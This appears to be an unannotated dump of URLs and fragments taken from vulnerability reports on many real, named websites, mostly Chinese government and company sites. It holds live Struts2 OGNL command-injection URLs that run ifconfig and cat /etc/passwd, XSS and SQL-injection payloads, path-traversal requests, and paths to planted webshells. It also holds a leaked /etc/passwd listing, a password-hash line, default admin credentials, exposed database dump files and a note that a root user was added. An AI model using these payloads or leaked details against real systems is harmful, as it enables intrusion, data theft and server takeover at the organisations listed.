http://124.127.49.85:8080/hdlAdmin/account/userLogin.action?redirect:${%20%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27ifconfig%27,%27-a%27}%29%29.start%28%29,%20%23b%3d%23a.getInputStream%28%29,%20%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%20%23d%3dnew%20java.io.BufferedReader%28%23c%29,%20%23e%3dnew%20char[50000],%23d.read%28%23e%29,%20%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%20%23matt.getWriter%28%29.println%28%23e%29,%20%23matt.getWriter%28%29.flush%28%29,%20%23matt.getWriter%28%29.close%28%29%20 http://hi.haidilao.com URL:wap.myicetea.linksrewards.com/convert_info.aspx?ex_id=10000000 http://www.minmengsh.gov.cn/oWebsiteFrontArticleContentShow.action http://www.funing.gov.cn/ycapp/nrglIndex.action http://interlibraryloan.utah.gov/ http://erules.rules.utah.gov/ http://www.nncrj.gov.cn/save-reservation.action http://58.218.194.33/xzxxgk/nrglIndex.action http://www2.4008123123.com/phhsios/RegAction/regUser.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D jdbc:jtds:sqlserver://phhsiosdbs:64291;DatabaseName=yumio jdbc:jtds:sqlserver://172.31.202.28;databasename=phhs2new http://www.qqhrczj.gov.cn/default!showNews.action?newsId=217 http://www.ynjst.gov.cn:85/czc/find.action http://www.wh.gov.cn/frontpage/pubinfo/PubinfoDetail.action http://www.lvye.com/cooperation/cooperation!toCooperation.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.bafangwang.com/cat.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.bafangwang.com/cat.do http://sso.bafangwang.com/security.action http://bengbu.bafangwang.com/cat.do http://chongqing.bafangwang.com/cat.do http://hangzhou.bafangwang.com/yqlj.do http://jinhua.bafangwang.com/storeDetail.do http://2fwww.bafangwang.com/info_issuance/infoDetail.do http://www.gdsts.org.cn/home.action http://udn.yonyou.com/uc_server/用友开发者家园 http://yunda.yonyou.com/ywlcwbnewsxx.do用友云达信息技术服务有限公司 http://chanjet.yonyou.com/admin.phpNC内部网站 http://store.yonyou.com/admin用友应用商城 http://ucenter.114piaowu.com/datum/personalData/modifyCommPassengersEdit.html?commId=126354 http://ucenter.114piaowu.com/datum/personalData/deleteCommPassengers.html?commId=126354 http://jingdian.114piaowu.com/jqscenic_gotoPwScenicOrder.action http://message.haidilao.com/manage/personalmgr/sys_account_total.aspx http://message.haidilao.com/Template/UpFiles/ http://ucenter.114piaowu.com/orders/scenic/scenicDetailsInfo.html?orderSerialID=19269 http://duizhang.haidilao.com/ http://click.xyx.ali213.net/vote.php?id=35285 http://ka.cwan.com/extend_taohaody.php?fid=1123779 http://ka.cwan.com/extend_tao.php?aid=566492 http://mentos.renren.com/ http://www.jumpw.com//Cms_Data/Contents/ngw/Media/asp/getcode.asp http://s.96335.com/business/jsp/showAuthorSend.action http://www.hbwzh.com/hbswlyxtweb/communist/Com_add.do http://123.kedou.com/help.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://content.icebox.cn http://pp.icebox.cn http://ssoserver.icebox.cn/toLogin.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.cdzfgjj.gov.cn/jeecms/ArtiSearch.do http://www.cgnpc.com.cn/ http://vc.cgnpc.com.cn:443/V2Conf/jsp/main/mainAction.do http://campus.cgnpc.com.cn:7001/hrrs/Campus/NewsDetail.html http://ocp.icloud.cn/index.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://appboss.icloud.cn/login.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://demo.jeecms.com/search.jspx?q=%2F%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3Ehello&channelId= http://edu.189.cn/eschool-user-portal/auth/loginPage.do http://www.hrblimin.gov.cn/NewsShow.asp?ArticleID=4236&classid=35 http://goldpen.ccidnet.com/ http://yibao-online.com/user!loginpage.do http://wap.hx168.com.cn/ http://message.haidilao.com/ http://sms.tjftz.gov.cn/ http://sms.ustc.edu.cn/ http://sms.pumch.cn/ http://sms.syswin.com:8081 http://app.focussend.com/sms/Login.aspx‎ http://dx1.lixin.edu.cn http://218.70.8.49:81/msdx/‎ http://dx.21eq.com/ http://bs.jtne.cn/login.aspx http://www.emay.cn/product/duanxin/p_156.htm https://demo.emay.cn/manage/ http://www.hnjt.gov.cn/hjs/queryfullinfo.aspx?id=561&sc=1ed72164-43d5-404a-b60a-7cc9104f7062 http://comic.tom.com/search.php http://comic.tom.com/search.php http://a.xcar.com.cn/cms/insertComment.php?id=1153351 http://meeting.5upay.com/web/index.action http://cx.chinacoop.gov.cn/com_Detail.asp?cid=13772 http://despatchwbep.sf-express.com/wbep/loginmgmt/index.action http://despatchwbep.sf-express.com/wbep/cho.jsp www.google.com超时 http://jingdian.114piaowu.com/SuZhou/cqq_index.jsp?sort=1&file=%2Fdata%2Fmysql%2Fmysql-bin.000002 http://jingdian.114piaowu.com/SuZhou/cqq_index.jsp?sort=1&file=%2Fdata%2Fmysql%2Fmysql-bin.000003 http://jingdian.114piaowu.com/SuZhou/cqq_index.jsp?sort=1&file=%2Fdata%2Fmysql%2Fmysql-bin.000001 http://jingdian.114piaowu.com/SuZhou/cqq_index.jsp?sort=1&file=%2Fdata%2Fmysql%2Fmysql-bin.000004 http://m.xgo.com.cn/index.php?c=ProList&a=SaleList&lineId=4431 http://kca.kingdee.com/ www.eis100.com http://www.eis100.com/1_.aspx http://www.eis100.com/下编辑器默认实例文件没有删除造成的 http://222.216.4.11:7001/FPApp/index.jsp http://dev.candou.com/login http://dev.candou.com/resetpwd?s=6634ab************f4e1 http://dev.candou.com/resetpwd?s=此处为md5加密后的目标邮箱 http://thqm.wo.com.cn/ http://ipub.cqvip.com/Shop/PackDetail.aspx?id=1FB8D1334B684E9391600E93A6B59629 http://vipblog.cqvip.com/user1/2545585/cmd.asp?uid=2545585&do=labdetail&Lab_lngID=195 http://mechnet.cqvip.com/asp/vipsearch.asp http://2010.cqvip.com/asp/vipsearch.asp http://lib.cqvip.com/zk/search.aspx http://www.cqvip.com/ajax/user.aspx?action=lf&ft=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://ipub.cqvip.com/main/search.aspx?k=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://ipub.cqvip.com/ajax/user.aspx?action=lf&ft=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://club.cqvip.com/showforum.aspx?forumid=654&filter=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://club.cqvip.com/showforum.aspx?search=1&forumid=654&typeid=0&filter=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&order=2 http://oldweb.cqvip.com/loginn.asp?HURL=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://uniondownpaper.cqvip.com/download/login.asp?id=http://oldweb.cqvip.com/loginn.asp?HURL=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://2010.cqvip.com/asp/download.asp?dwNo=&Prev=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Order=&Next=&ZJ=&Flag=&SUID= http://club.cqvip.com/showuser.aspx?orderby=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&ordertype=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&page=2 http://2010.cqvip.com/asp/favorites.asp?title=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://2010.cqvip.com/qk/98592C/target=_blank%20href=http://my.cqvip.com/CustomMagazine.asp?action=modi&gch=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://bbs.cqvip.com/showtopiclist.aspx?search=1&type=digest&newtopic=600&order=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&direct=&forumid=-1&forums=&page=2 http://oldweb.cqvip.com/asp/SearchZK.asp?T=1&E=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://jd.hshfy.sh.cn/jdfyww/mainpageInfo.action http://wap.sm.gov.cn/index.action http://211.147.214.131:8081/query/index.jsp?sort=1&file=D%3A%5Cmsd_web%5Ctaobao1.4%5Czfb%5CLP00014063396059_order_20130730041245_3258.xml http://114.112.70.45:8000/ http://114.112.82.74/ http://localhost/plt_iservice/service/findFavList.action http://www.cdtdc.com/djqy/login.jsp http://www.cdtdc.com/djqy/index.jsp然后可用默认密码进入,用户名:admin密码:admin http://www.codoon.com/login登陆账号;输入qq邮箱和构造的弱密码123456登陆: http://www.halh.lss.gov.cn/showChaXun_yanglzh.action http://bbs.cqvip.com/ http://xin.cwan.com/ http://data.simuwang.com/dt_company_info.php?id=CO0000008E http://g.baofeng.com/ http://g.baofeng.com/userservice/submitquestion http://g.baofeng.com/admin/login http://bbs.g.baofeng.com/ http://sns.zhulong.com/thread/index?uid=8541403 http://mail.163.com/ http://wap.mail.163.com/ http://www.hbgzcx.com/jtlk/roadinfo/get.do http://218.85.65.28/gzcx/jtlk/traffic_weather.do http://113.240.255.154:8081/jtgzcx/pages/traficgetlist_roadname.action?typename=0 http://211.138.108.116/pages/ http://www.renren.com/Block.do?id=xxxxxx mx://res/options/index.htm,获取设置操作相关的代码就有机会控制浏览器。 mx://res/base/js/ext/mx.config.js mx://res/options/js/all.js http://mm.maxthon.cn/feedback/feedback-list.php?deviceid=xxx&lang=x http://www.a.com/mx.js http://www.a.com/mx.js http://61.128.217.228:8080/CPAtransfer/UserLoginForm!toChinese.action http://shop319293.p14.shopex.cn/ http://shop319100.p24.shopex.cn http://shop319100.p24.shopex.cn/themes/ypgx/weichen.php http://shop319100.p24.shopex.cn/icesword.php http://m.heiyan.com/ http://www.jybus.com.cn http://www.jybus.com.cn/chaxun/config.xml这个文件,配置内容直接显示出来 www.zhujh.net”作为初始密码,查询了一下,发现这与拿来还是个通用的asp公交车查询系统,是某人在2004年就开发的,在网上搜了一下发现依旧有许多源码下载站提供下载,下载量也不小 http://www.jybus.com.cn/chaxun/admin.asp http://www.dyp2p.com:80/ http://223.202.0.158 http://www.elleshop.com.cn/women.shtml http://passport.elleshop.com.cn/getpassword.aspx### http://passport.elleshop.com.cn/setnewpassword.aspx?token= http://223.202.0.216 http://www.xinbaigo.com/index.html http://nucleartransparency.fas.org http://nucleartransparency.fas.org/map/login.action‎ http://cuta.ruc.edu.cn/admin.php http://psy.ruc.edu.cn/facultyinfo.php?id=14 http://m.heiyan.com/accounts/forget http://m.heiyan.com/accounts/register http://m.heiyan.com/accounts/login http://www.heiyan.com/accounts/agree http://www.51credit.com http://www.51credit.com/shanghu/ucMerchant_showInfo.do http://pop.hb165.com/mail/login.action www.easou.com http://w.easou.com/listsMark.do root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin kai:x:501:501::/home/kai:/bin/bash terry:x:502:502::/home/terry:/bin/bash resin:x:505:505::/home/resin:/bin/bash asoon:x:507:507::/home/asoon:/bin/bash http://app.easou.com/ http://pop.bjgwbn.net.cn http://pop.bjgwbn.net.cn/1.rar http://pop.bjgwbn.net.cn/web.rar www.4008267267.com,在订单单页就可以注入了,没有任何过滤。 http://www.joust.cn/cn.aspx http://www.ylmb.gov.cn/phpMyAdmin/index.php?server=1&target=server_variables.php&lang=zh-utf-8&convcharset=gb2312&collation_connection=utf8_unicode_ci&token=ff7543fc5a4abb04cdbdae712995c96 http://116.56.184.3/jmx-console webshell:http://116.56.184.3/myname/index.jsp http://116.56.184.3/edoas2/xitongguanli/anquanguanli/getSecurity http://61.133.219.10/exam/adult/Regist.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.4008267267.com/upload/admin.php http://www.ioscea.ac.cn/login.action http://zhaoren.idtag.cn/samename/searchName!searchIndex.htm?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://talk.myfriday.me/tbiaobiao/ http://www.longmaster.com.cn/jobDoc/jobDetail.aspx?positionId=19 qqbrowser://html/error.html#404&指定的网页不存在&http://xxx.qq.com/xxx http://www.qq.com/404/search_children.js http://www.jyb.cn/digg/jsiframe.php?id=160 http://admin.ask.jyb.cn/ask.php?c=49,55,56,62,59,64,63,60,61 http://admin.ask.jyb.cn/Login.php http://gxsjk.jyb.cn/searchLqfs.html?province= http://tieba.baidu.com/f/vote/create?kw=贴吧地址xxxxxxxx http://www.jxcehui.gov.cn/admin/Data/kaliz.aspx http://survey.inewsweek.cn/vote_result.php?vote_id=208 http://survey.inewsweek.cn/ring_result.php?ring_id=243 http://viewpoint.inewsweek.cn/columns/columns_detail.php?id=3149 http://news.inewsweek.cn/news_detail.php?id=49361 http://shequ.inewsweek.cn/FCKeditor/editor/fckeditor.html http://shequ.inewsweek.cn/topics_add_up_file_to_FCK.php http://www.dqjc.com/loadIndex.action,执行任意命令,添加root权限用户pot成功 zsc:x:0:0::/home/zsc:/bin/bash LSpqSy1JMZq54K47yDLEt1:14224:0:99999:7 http://blog.csdn.net/llbbzh/article/details/9736979) http://write.blog.csdn.net/feedback) http://baozoumanhua.com/ http://csm.happigo.com/happigo/loginAction!linkLogin.action?empId=900083&key=237da08b6a25fee673ee5ce129d25319 http://www.xxx.com/index.php?igo=be,admin,login http://www.t3pay.cn/shell.jsp http://epos.t3pay.cn/shell.jsp http://sms.tom.com/pk12530/ub/news_admin/index.php?id=18 http://m.tom.cn/appweb/book/xiazai.jsp?s=116 http://www.nmggbzzxx.com/ http://www.nmggbzzxx.com/kccd_list.aspx?id=11 http://event.ftms.com.cn/box.php?id=-226%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,user%28%29,17,18,19,20,21,22,23,24,25,26,27,28 http://221.215.38.132:8099/wssb/xgxz/list.action http://221.215.38.132:8099/wssb/xgxz/list.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://221.215.38.132:8099/wssb/xgxz/list.action?redirect:${%20%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%20%23b%3d%23a.getInputStream%28%29,%20%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%20%23d%3dnew%20java.io.BufferedReader%28%23c%29,%20%23e%3dnew%20char[50000],%23d.read%28%23e%29,%20%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%20%23matt.getWriter%28%29.println%28%23e%29,%20%23matt.getWriter%28%29.flush%28%29,%20%23matt.getWriter%28%29.close%28%29%20 http://221.215.38.132:8099/wssb/xgxz/list.action?redirect:${%20%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27ifconfig%27,%27-a%27}%29%29.start%28%29,%20%23b%3d%23a.getInputStream%28%29,%20%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%20%23d%3dnew%20java.io.BufferedReader%28%23c%29,%20%23e%3dnew%20char[50000],%23d.read%28%23e%29,%20%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%20%23matt.getWriter%28%29.println%28%23e%29,%20%23matt.getWriter%28%29.flush%28%29,%20%23matt.getWriter%28%29.close%28%29%20 http://data.games.sina.com.cn/zqShowInfo.php?aid=162907 http://data.games.sina.com.cn/zqInfoAdd.php?game_id=136&category_id=2856 http://service.cheshi.com/complain/complain.php http://58.252.5.165/pople.asp URL:http://yao.xywy.com/index.php?a=newajaxgetdrugshop&drugid=39842-2%2b4-2-2%2b99&pinyin=sjs gzgl.etec.edu.cn/uids/login!login.action http://www.517huwai.com/Photo/doUploadEditorAttach http://file.517huwai.com/Public/Uploads/2013/08/04/51fdfa0c30a6c.php http://www.998.com/Reservations/Hotel_Detail.aspx?HotelCode=121224 http://www.998.com/ScriptResource.axd?d=xxoo http://wooyun.org/bugs/wooyun-2010-025911 http://www.gsjtzb.com/gsjtzb.rar http://61.187.56.156:9090/ http://hmms.haier.net/security/login.action http://service.haier.net:8080/bbs/upload/member.php?action=list&srchmem=&order=regdate&type=&page=1 http://10.128.3.67:8080/css/logined.jsp?forward=http%3A%2F%2Fservice.haier.net%3A8080%2Fbbs%2Fupload%2Fmember.php%3Faction%3Dlist%26srchmem%3D%26order%3Dregdate%26type%3D%26page%3D100 http://itpx.haier.com/bbs/search.asp?action=re&t=261&s=dvbbs https://bcc.haier.com/Module/Admin/frm_fyysjl.aspx http://203.208.46.148/#bav=on.2,or.&ei=8un9UeHhH4XwkAWhu4HwCw&fp=34d30f151318e80d&newwindow=1&q=site:bcc.haier.com&sa=N&start=0 https://bcc.haier.com/BCCZB201104.xls https://bcc.haier.com/BCCZB201101.xls https://bcc.haier.com/BCCAMP/Module/GGF/QTLC/Frm_Image_File.aspx?table=t_GGF_Directive_Sub_FJ2&cbillcode=GG10102810158756&iid=1 http://file.517huwai.com/Public/Thumb/?w=225&h=1000&t=f&url=./Public/Uploads/2013/08/04/51fde94d30faa.jpg http://file.517huwai.com//Public/Uploads/2013/08/04/51fde94d30faa.jpg我们整理成这样。 http://www.casarte.cn/plugin.php?action=show&fid=6450&id=casarte_vote:index http://www.casarte.cn/ksd/list.php?city=大连 http://www.casarte.cn/pcenter/robots.txt http://global.midea.com.cn/midea/download.jsp?url=../../../../../../etc/issue http://global.midea.com.cn/midea/news/news-list.action http://news.wehefei.com/htmlphp/guest/show.php?id=16 http://xyxxgk.hnsl.gov.cn/LoadPublicViewEmployeesList.action http://www.baidu.com chrome://resources chrome-extension://mndnfokpggljbaajbnioimlmbfngpief http://www.j1.com/show-forgetPassword.html http://61.172.201.211/ http://dict.baidu.com/wordlist.php http://xsserme http://218.58.70.220/ http://218.58.70.220/sl.asp;.txt http://218.58.70.220/wooyun.txt http://218.58.70.220/WJ_MarketNew/ http://218.58.70.220/WJ_Market/ http://218.58.70.220/WasterDayWork/ http://218.58.70.220/SupplyAudit/ http://218.58.70.220/wj_zndz/ http://218.58.70.220/Protype/ http://www.cztv.com/kaoshi/ http://www.cztv.com/kaoshi/plus/mytag_js.php?aid=9090 http://buy.eshare.189.cn/youhui.php?ctl=store&act=view&id=28 http://222.247.54.151/ http://119.10.114.213/html/Login.aspx http://mobile.ganji.com/?ajax=true&ajax_act=send_phone&url=短信内容&phone=手机号 http://t.jd.com/product/followProduct.action?productId=934543&t=0.0032420307736847898 https://idss.haier.net http://user.sanwen8.cn/admin/edit?aid=1320441 http://219.232.246.221 http://drops.wooyun.org/tips/68 http://www.lyjyw.gov.cn http://96093.fm93.cn/dede/index.php http://rsj.zjjcl.gov.cn/admin/ http://rsj.zjjcl.gov.cn/admin/Databackup/3.php http://tieba.56.com/v?tn=6381708 http://tieba.56.com:81/后台你懂的/test.php http://musicbox.56.com http://musicbox.56.com/player.html?mid=5757764&userid=gankfuck http://ztv.divast.com/jmx-console http://www.a6gps.com http://www.jjghj.gov.cn/jjghj/info.php?infos_id=731 http://www.jjghj.gov.cn/jjghj/info.php?infos_id=731000000 http://www.jdxf.gov.cn/download.php http://www.jdxf.gov.cn/down.php?dd=文件名 http://www.jdxf.gov.cn/down.php?dd=../down.php http://biz.finance.sina.com.cn/search/product/detail_futures.php?id=1 http://biz.finance.sina.com.cn/search/product/detail_futures.php?id=1 http://218.58.70.220/ http://user.sanwen8.cn/会员中心COOKIE验证问题 http://www.yindarunhe.com/initService.action http://www.t3pay.cn/gameAction!toGamePay.action http://www.xmobo.com/website/downloadDian.action http://www.paymei.net/unionEposAction!toEposPaymentByYeQuery.action cn:8004 http://dev.10086.cn/(移动开发者论坛)这个站论坛里面的shmily1023121用户,超级管理员哦,到最后没社工成功,反倒发现了sql注入,首先说下社工shmily1023121管理员的失败过程吧,但是也值得注意,安全意识有提升的空间 http://www.boohee.com/ http://dev.10086.cn/cmdn/supesite/newdev.joyesdetail.php?recommendId=24 http://events.youku.com/acer/.svn/entries http://minisite.youku.com/newproduct/event/apple912/getfile.php?file=apple0912_windows.ics http://vq.youku.com/resin-admin/digest.php http://v.youku.com/v_show/id_XNTg2ODg3ODcy.html?f=19400289&o=%3C/script%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E;// http://v.youku.com/v_show/id_XNTg2ODg4MzMy.html?f=19400289&o=0 http://v.youku.com/v_show/id_XNTg2ODg3ODcy.html?f=19400289&o=0 http://v.youku.com/v_show/id_XNTg2ODg3OTM2.html?f=19400289&o=0 http://v.youku.com/v_show/id_XNTg2ODg4MjQ0.html?f=19400289&o=0 http://v.youku.com/v_show/id_XNTkwNTcwNjA4.html?f=19400287&o=0 http://v.youku.com/v_show/id_XNTg2ODg2Njg4.html?f=19400289&o=0 http://v.youku.com/v_show/id_XNTkwNTcwOTEy.html?f=19400287&o=0 http://v.youku.com/v_show/id_XNTg3NTc5NjE2.html?f=19400287&o=0 http://v.youku.com/v_show/id_XNTg3NTc5Njk2.html?f=19400287&o=0 http://v.youku.com/v_show/id_XNTg0NTU3NDA4.html?f=19400284&o=0 http://i.youku.com/u/UNDE2NTYzMzky/videos/?q=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://i.youku.com/u/UMTA5NTc5NzY http://i.youku.com/u/UMTMwMzg5Mg http://i.youku.com/u/UMzM3NDM5MzM2 http://i.youku.com/u/UMjc5MzI5NDA http://i.youku.com/u/UNDA5NDkzOTEy/ http://i.youku.com/u/UMzg1OTc3MDU2 http://i.youku.com/u/UMTM2NzgyNzE2/ http://i.youku.com/u/UMTcyNzk3ODM2/ http://i.youku.com/u/UNTY5MDQ5Njcy/ http://i.youku.com/u/UMzUxNzk5Njg0/ http://i.youku.com/u/share/?url=This%20is%20a%20test%22%3E%3C/textarea%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://oreo.youku.com/api/pop_video.php?vid=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://comments.youku.com/comments/comments?id=73500&bind_type=1&pl=5&width=0&height=0&minisite=0&color=1&backurl=%3C/script%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E;// http://minisite2.youku.com/activities_fee/www/integral/continue_sign_in.php?callback=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://i.youku.com/u/search?q=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://www.youku.com/playlist_show/id_19485175.html?page=1&mode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&ascending=1 http://v.youku.com/v_map?lng=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&lat=41.8087005615 http://www.jukuu.com/portal/video.php?id=12800 http://www.aouu.com/ddpim/pim.action http://blog.home.blogbus.com/settings/basic。 http://www.haibi.com/sdo/planeB2c.do http://s.baixing.net/page/combine.php?files=/../index.php http://117.79.[马赛克]:8080/ http://www.jxgh.gov.cn/jg/display.php?newsId=356 http://www.jxgh.gov.cn/jg/display.php?newsId=356 http://g.19e.cn/index.do http://61.183.175.27 www.jxf.gov.cn/WebContent.rar www.jxf.gov.cn/T_INTERACT.dmp www.jxf.gov.cn/t_info.dmp www.jxf.gov.cn/t_info1.dmp http://www.clubwanda.com.cn http://www.tcwenchang.gov.cn/pro_display.php?id=67 http://www.apppark.cn存在structs2漏洞,现在洞洞还没补上 http://www.apppark.cn/software_recommand_other.action http://www.qhfda.gov.cn http://www.whzj.gov.cn/quality.php?fid=4 http://www.xingbin.gov.cn/info/type/?type_id=52 